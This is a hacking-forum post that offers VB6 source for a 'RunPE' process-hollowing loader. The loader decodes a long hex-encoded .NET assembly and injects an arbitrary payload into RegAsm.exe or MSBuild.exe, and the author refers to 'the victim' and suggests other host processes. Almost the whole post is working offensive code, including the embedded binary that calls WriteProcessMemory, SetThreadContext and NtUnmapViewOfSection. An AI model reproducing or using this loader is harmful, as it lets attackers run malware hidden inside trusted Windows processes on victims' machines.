
VB6 CLR RunPE x86 / Native & .NET

Publicado: 23 Nov 2019, 20:28
por Anony Hacker
Hello friends

I took the C# RunPE and imported it into your favorite VB6 with the help of the Common Language Runtime.
So let's get started.
For RunPE to work we need .NET Framework 2.0; we need to add these two type libraries to our project's References:


C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.tlb
Just stipulate that the work of the victim on the computer is not as it will not affect, now .NET Framework is part of Windows, it is in our hands

Now you can use this RunPE



'''''''' RunPE .net CLR '''''''''
'''''''' By MR. MORFEY ''''''''''
''' My Telegram: M0RF3Y0x1337 '''

Private Declare Function DispCallFunc Lib "oleaut32" (ByVal pv As Long, ByVal ov As Long, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As Long, ByRef par As Variant) As Long
Private Declare Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As Long)
Private Declare Function VarPtrArray Lib "msvbvm60" Alias "VarPtr" (ByRef Ptr() As Any) As Long

Public Function RunPE(Arg As String, PayLoad() As Byte)
Dim host As New mscoree.CorRuntimeHost, dom As AppDomain
host.Start
host.GetDefaultDomain dom
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.hex"
Dim bytes() As Byte
ShellCode = ShellCode & "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005045"
ShellCode = ShellCode & "00004C010300997BD95D0000000000000000E00022210B010B000014000000060000000000008E32000000200000000000000000400000200000000200000400000000000000040000000000000000800000000200000000000003004085000010000010000000001000001000000000000010000000000000000000000034320000"
ShellCode = ShellCode & "57000000004000005803000000000000000000000000000000000000006000000C000000D43100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000941200000020"
ShellCode = ShellCode & "00000014000000020000000000000000000000000000200000602E7273726300000058030000004000000004000000160000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001A000000000000000000000000000040000042000000000000000000000000000000007032000000000000"
ShellCode = ShellCode & "4800000002000500EC230000E80D000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001330020015000000000000000225280100000A037D0100000402047D020000042A000000133001000700000000000000027B010000042A001330"
ShellCode = ShellCode & "01000700000000000000027B020000042A7E7201000070280500000A720F00007003280600000A040517280F000006262A00133004001B00000001000011170A2B110203040528100000062C02172A0617580A061B31EB162A001B300A00D502000002000011160A725900007002280700000A0B1202FE15050000021203FE150400"
ShellCode = ShellCode & "00021202D005000002280800000A280900000A280A00000A7D0700000403280B00000A2D0D07726700007003280600000A0B02077E0C00000A7E0C00000A1620040000087E0C00000A141202120328040000062D06730D00000A7A041F3C280E00000A13040411041F3458280E00000A130520B30000008D11000001130611061620"
ShellCode = ShellCode & "020001009E280F00000A1A3315097B04000004110628050000062D1B730D00000A7A097B04000004110628060000062D06730D00000A7A11061F29941307161308097B0300000411071E5812081A120028090000062D06730D00000A7A110511083315097B030000041108280B0000062C06730D00000A7A0411041F5058280E0000"
ShellCode = ShellCode & "0A13090411041F5458280E00000A130A16130B097B030000041105110920003000001F40280C000006130C052D1E110C2D1A17130B097B0300000416110920003000001F40280C000006130C110C2D06730D00000A7A097B03000004110C04110A1200280A0000062D06730D00000A7A110420F800000058130D0411041C58281000"
ShellCode = ShellCode & "000A130E1613112B7004110D1F0C58280E00000A131204110D1F1058280E00000A131304110D1F1458280E00000A131411132C3811138D12000001131504111411151611158E69281100000A097B03000004110C111258111511158E691200280A0000062D06730D00000A7A110D1F2858130D1111175813111111110E328A110C28"
ShellCode = ShellCode & "1200000A130F097B0300000411071E58110F1A1200280A0000062D06730D00000A7A0411041F2858280E00000A1310110B2C041105130C11061F2C110C1110589E280F00000A1A3315097B04000004110628070000062D1B730D00000A7A097B04000004110628080000062D06730D00000A7A097B04000004280D00000615330673"
ShellCode = ShellCode & "0D00000A7ADE2326097B05000004281300000A281400000A131611162C0711166F1500000A161317DE02172A11172A000000411C0000000000003900000074020000AD02000023000000050000011E02281600000A2A42534A4201000100000000000C00000076322E302E35303732370000000005006C0000002C060000237E0000"
ShellCode = ShellCode & "98060000D004000023537472696E677300000000680B00006C00000023555300D40B0000100000002347554944000000E40B00000402000023426C6F62000000000000000200000057B5A2150902000000FA01330016C4000100000022000000050000000F0000001100000031000000220000001A00000001000000020000000200"
ShellCode = ShellCode & "0000010000000200000002000000020000000A0000000100000002000000020000000000E80201000000000006009002F70206002A016C030600FE00F7020600DF03F7020600FE03F70206006902AF0406000504F7020600B302F7020A00D70359030600EB00F7020600BD00F7020600C9026C0306001104F70206005203F7020600"
ShellCode = ShellCode & "2503F70206003F03F70206001A00F70206009A02F70206003803F70206007A04F7020600E100F7020600DE018B0306004B028B0306003E0113030600FE0113030600170213030600AC01130306007001130306003202130306008D0113030600550113030600F0006C030600160159038700AB030000000000004800000000000100"
ShellCode = ShellCode & "010001011000C901000005000100010001001000550000001500030004000B011000600000005500030012000B0110006B000000550007001200010060000A00010072000D0006006000EB0006006B00EB00060072001C01060099001C01060060001C0106006B000A00060072000A00060099000A000610A8021F010600B102EB00"
ShellCode = ShellCode & "0600BE02EB000600C502EB000600C702EB0050200000000086184C0314000100742000000000860060001A000300882000000000860072001E0003000000000080009160C9034400030000000000800091602F045B000D00000000008000916019045B000F00000000008000916056045B001100000000008000916040045B001300"
ShellCode = ShellCode & "00000000800091608A046200150000000000800091609C046D001A000000000080009160FE0278001F00000000008000916067047E00210000000000800091608300870026009B20000000008600900098002700BC200000000096002F03A4002A00E4200000000091006000A4002E00E4230000000086184C031000320000000100"
ShellCode = ShellCode & "6000000002007200000001000100000002000500000003002000000004002400000005002800000006002C00000007003800000008003C0000000900400000000A0044000000010001000000020005000000010001000000020005000000010001000000020005000000010001000000020005000000010001000000020005000000"
ShellCode = ShellCode & "03002000000004002400000005002800000001000100000002000500000003002000000004002400000005002800000001000100000002000500000001000100000002000500000003002000000004002400000005002800000001000100000001006D0000000200BA0200000300760400000100C002000002009500000003005B00"
ShellCode = ShellCode & "00000400B20000000100010000000200050000000300200000000400240009004C03100011004C032A0019004C03350031004C03100039009B008C004100F00391004100F703CE005100CF00D4006100AA02DB0069000900E1004100BF04E60071003303EB0079004C03100081001200EE0071009F02F50081003000F90099008004"
ShellCode = ShellCode & "00018100BA030B016900120011014900740016014900F202100029004C031000B1004C032601B9004C031000C1004C035301C9004C035301D1004C035301D9004C035301E1004C035301E9004C035301F1004C035301F9004C03530101014C03530109014C03D5012E000B01AB012E001300A5012E0003012F002E00FB002F002E00"
ShellCode = ShellCode & "F3002F002E00EB0098012E00E3002F002E00DB0080012E00D30058012E000A0063012E00CB0058012E001301DC012E00C30034012E00BB002B0143001B003B00430013002F00800023005600A00023005600C00023005600E00023005600000123005600200123005600400123005600600123005600800123005600A00123005600"
ShellCode = ShellCode & "1600230101000000000004000100000000000500A000AD0002000100000051002200000053002600020002000300020003000500D102DE0204010900C903010000010B002F04010000010D001904010000010F00560401000001110040040100000113008A040100000115009C04010000011700FE02020000011900670401000001"
ShellCode = ShellCode & "1B0083000100048000000100000000000000000000000000C303000002000000000000000000000001006200000000000200000000000000000000000100F702000000000400030005000300000000000000000000415F3000415F3100546F55496E74333200546F496E74333200496E74333200415F3200415F3300415F3400415F"
ShellCode = ShellCode & "3500546F496E74313600415F3600415F3700415F3800415F39003C4D6F64756C653E004100430052756E504500646174610061006D73636F726C696200620070726F6300630047657450726F636573734279496400526573756D65546872656164004C6F616400636D64006400476574456E7669726F6E6D656E745661726961626C"
ShellCode = ShellCode & "6500636F6D70617469626C650052756E74696D655479706548616E646C65004765745479706546726F6D48616E646C650056616C756554797065005479706500477569644174747269627574650041747472696275746555736167654174747269627574650044656275676761626C6541747472696275746500436F6D5669736962"
ShellCode = ShellCode & "6C6541747472696275746500417373656D626C795469746C6541747472696275746500417373656D626C7954726164656D61726B41747472696275746500417373656D626C7946696C6556657273696F6E41747472696275746500417373656D626C79436F6E66696775726174696F6E41747472696275746500417373656D626C79"
ShellCode = ShellCode & "4465736372697074696F6E41747472696275746500446F746675736361746F7241747472696275746500436F6D70696C6174696F6E52656C61786174696F6E7341747472696275746500417373656D626C7950726F6475637441747472696275746500417373656D626C79436F707972696768744174747269627574650041737365"
ShellCode = ShellCode & "6D626C79436F6D70616E794174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465005375707072657373556E6D616E61676564436F64655365637572697479417474726962757465004174747269627574650042797465006765745F53697A6500650053697A654F66006600537472696E"
ShellCode = ShellCode & "67004172670067007061746800680069004D61727368616C006B65726E656C33322E646C6C006E74646C6C2E646C6C00436C6173732E646C6C004B696C6C0053797374656D004E74556E6D6170566965774F6653656374696F6E0053797374656D2E5265666C656374696F6E00457863657074696F6E0052756E005A65726F004275"
ShellCode = ShellCode & "6666657200426974436F6E766572746572002E63746F7200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F646573004765"
ShellCode = ShellCode & "74427974657300436C6173730043726561746550726F636573730050726F63657373004174747269627574655461726765747300436F6E63617400466F726D6174004F626A65637400456E7669726F6E6D656E7400436F6E7665727400576F773634476574546872656164436F6E7465787400476574546872656164436F6E746578"
ShellCode = ShellCode & "7400576F773634536574546872656164436F6E7465787400536574546872656164436F6E74657874005669727475616C416C6C6F6345780070617900417272617900426C6F636B436F7079005265616450726F636573734D656D6F727900577269746550726F636573734D656D6F72790053797374656D2E53656375726974790049"
ShellCode = ShellCode & "734E756C6C4F72456D70747900000000000D570069006E0044006900720000495C004D006900630072006F0073006F00660074002E004E00450054005C004600720061006D00650077006F0072006B005C00760032002E0030002E00350030003700320037005C00000D200022007B0030007D0022000003200000005C34360349F5"
ShellCode = ShellCode & "EE4AAE76F941D7E8422B0008B77A5C561934E08902060E02060803200001052002010E080320000E032000080328000E03280008042001010205010000000005200101111108010001000000000011000A020E0E18180209180E101114101110040100000006000202181D080A000502180810080810080A00050218081D05081008"
ShellCode = ShellCode & "05000208180808000508180808080804000108180400010E0E0600030E0E0E0E072003010E0E1D0503070108080004020E0E1D0502200718080E1114111008081D0808080808020808061D0508080808081D051225020500020E0E1C0600011229112D0500010812290400010908040001020E020618060002081D05080300000806"
ShellCode = ShellCode & "0002061D05080A000501125108125108080500011D0508040001080905000112250802060903061D05021E2404200101080801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F777301042001010E0A010005436C61737300001C0100133030303A303A303A352E34322E302E393531340000"
ShellCode = ShellCode & "0000000017010012436F7079726967687420C2A920203230313900000C010007312E302E302E3000000501000100002901002431393661366538342D383337652D346236342D623964362D6462626132353839343764330000062001011180890801000200000000001C012D405E5F606B626D646F6B656C6B686B6A767370744142"
ShellCode = ShellCode & "43444546000000000000997BD95D000000000200000041000000F0310000F01300005253445369C8DB59B1CE1947866EE477F8F0230201000000443A5C436C6173735C62696E5C44656275675C446F7466757363617465645C436C6173732E706462000000005C32000000000000000000007E320000002000000000000000000000"
ShellCode = ShellCode & "000000000000000000000000703200000000000000000000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000FC0200000000000000000000"
ShellCode = ShellCode & "FC0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F0000000000240004000000"
ShellCode = ShellCode & "5400720061006E0073006C006100740069006F006E00000000000000B0045C020000010053007400720069006E006700460069006C00650049006E0066006F0000003802000001003000300030003000300034006200300000001A000100010043006F006D006D0065006E007400730000000000000022000100010043006F006D00"
ShellCode = ShellCode & "700061006E0079004E0061006D0065000000000000000000340006000100460069006C0065004400650073006300720069007000740069006F006E000000000043006C006100730073000000300008000100460069006C006500560065007200730069006F006E000000000031002E0030002E0030002E003000000034000A000100"
ShellCode = ShellCode & "49006E007400650072006E0061006C004E0061006D006500000043006C006100730073002E0064006C006C0000004800120001004C006500670061006C0043006F007000790072006900670068007400000043006F0070007900720069006700680074002000A90020002000320030003100390000002A00010001004C0065006700"
ShellCode = ShellCode & "61006C00540072006100640065006D00610072006B00730000000000000000003C000A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D006500000043006C006100730073002E0064006C006C0000002C0006000100500072006F0064007500630074004E0061006D0065000000000043006C006100"
ShellCode = ShellCode & "730073000000340008000100500072006F006400750063007400560065007200730069006F006E00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "0000000000000000000000000000000000000000000000000000003000000C000000903200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "000000000000000000000000000000000000"
EL.Text = ShellCode
bytes = EL.NodeTypedValue
Dim vTypes(0 To 1) As Integer
Dim vValues(0 To 1) As Long
Dim pPArry As Long: pPArry = VarPtrArray(bytes)
Dim pArry As Long
RtlMoveMemory pArry, ByVal pPArry, 4
Dim vWrap: vWrap = pArry
vValues(0) = VarPtr(vWrap)
vTypes(0) = 16411
Dim pRef As Long: pRef = 0
Dim vWrap2: vWrap2 = VarPtr(pRef)
vValues(1) = VarPtr(vWrap2)
vTypes(1) = 16396
Call DispCallFunc(ObjPtr(dom), 45 * 4, 4, vbLong, 2, vTypes(0), vValues(0), 0)
Dim aRef As mscorlib.Assembly
RtlMoveMemory aRef, pRef, 4
aRef.CreateInstance("RunPE").Load "RegAsm.exe", Arg, PayLoad
End Function
Let me tell you about the parameters.

You can pass arguments to the process.

Injection by default occurs in "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"; you can use another process from this directory, for example MSBuild.exe.
I hope you understood everything; now I wish you good luck.